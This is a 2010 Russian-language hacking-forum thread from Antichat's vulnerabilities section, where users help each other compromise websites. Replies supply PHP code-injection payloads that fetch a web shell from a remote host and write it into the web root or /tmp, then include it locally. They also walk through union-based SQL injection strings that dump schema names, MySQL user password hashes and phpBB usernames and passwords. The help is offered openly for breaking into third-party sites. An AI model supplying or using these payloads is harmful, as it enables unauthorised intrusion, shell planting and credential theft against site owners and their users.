ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13691  
Старый 07.06.2010, 21:30
Аватар для CyberHunter
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Цитата:
Скажите в чем проблема, когда заливаю шелл через админку в е107 CMS (делаю все как тут, первым и вторым способами), появляется ошибка: That file does not appear to be a valid .zip or .tar archive. Что не так делаю? Плагин заливаю 100% в формате .zip. Такое на всех сайтах, на которых доставал админку, происходит.
Что не так? И как залить шелл?
Ответьте плз.
 
Ответить с цитированием

  #13692  
Старый 08.06.2010, 01:24
Аватар для a1ertso
a1ertso
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927

Репутация: 0
По умолчанию

При выполнении запроса типа: site.ru/index.php?id=phpinfo(); Могу просмотреть пхпинфо. А как залить файл?
 
Ответить с цитированием

  #13693  
Старый 08.06.2010, 01:34
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от a1ertso  
При выполнении запроса типа: site.ru/index.php?id=phpinfo(); Могу просмотреть пхпинфо. А как залить файл?
id=include("http://yoursite.com/yourfile");

id=copy($_GET[file1],$_GET[file2]);&file1=http://yoursite.com/yourfile.txt&file2=/yourpath/to/webfolder/

например

file1=http://microsoft.com/shell.txt&file2=/var/www/html/shell.php

если не знаешь полный путь к сайту to копируй шелл в папку /tmp

потом делай локальный инклуд
include("/tmp/shell.php");

Последний раз редактировалось Konqi; 08.06.2010 в 01:39..
 
Ответить с цитированием

  #13694  
Старый 08.06.2010, 08:12
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Есть SQL inj.
Перебрал все таблицы и колонки, но не могу вывести информацию из этих таблиц.
5 ветка.
1,2,3,4,5,passwords,7+from+site_users--
Надо как бэ указать юзера БД, чтобы вывести информацию? Но как это сделать?
 
Ответить с цитированием

  #13695  
Старый 08.06.2010, 08:24
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

1,2,3,4,5,schema_name,7+from+information_schema.sc hemata--
 
Ответить с цитированием

  #13696  
Старый 08.06.2010, 08:40
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Цитата:
Сообщение от LokbatanLi  
1,2,3,4,5,schema_name,7+from+information_schema.sc hemata--
ок, ну как вывести password указв при этом юзверя БД?
 
Ответить с цитированием

  #13697  
Старый 08.06.2010, 08:47
Аватар для Redwood
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от SeNaP  
ок, ну как вывести password указв при этом юзверя БД?
select+1,2,3,4,5,password,7+from+mysql.user+where+ user='имя юзера'
 
Ответить с цитированием

  #13698  
Старый 08.06.2010, 08:48
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Цитата:
Сообщение от Redwood  
select+1,2,3,4,5,password,7+from+mysql.user+where+ user='имя юзера'
т.е. ?
1,2,3,4,5,username,7+from+phpbb_users--
и user() - u34129
 
Ответить с цитированием

  #13699  
Старый 08.06.2010, 08:51
Аватар для Redwood
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от SeNaP  
т.е. ?
1,2,3,4,5,username,7+from+phpbb_users--
и user() - u34129
А, сори не так понял, я думал тебе надо юзера, под которым работает БД )
Если нужно вывести пароль нужного пользователя из таблицы phpbb_users, то вот так
select+1,2,3,4,5,concat_ws(0x3a,username,user_pass word),7+from+phpbb_users+where+username='имя юзера'
и подставь свои значения колонок, по дефолту для phpbb, как мне помниться это username и user_password

Последний раз редактировалось Redwood; 08.06.2010 в 10:19..
 
Ответить с цитированием

  #13700  
Старый 08.06.2010, 08:59
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Цитата:
Сообщение от Redwood  
А, сори не так понял, я думал тебя надо юзера, под которым работает БД )
Для того, чтобы тебе вывести имя нужного пользователя из конкретной таблицы надо сделать запрос select+1,2,3,4,5,username,7+from+phpbb_users+where +username='имя юзера'
Первый раз ты правильно понял
мне как раз вот это и нужно
Цитата:
под которым работает БД )
Просто помоги составить запрос с теми данными
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ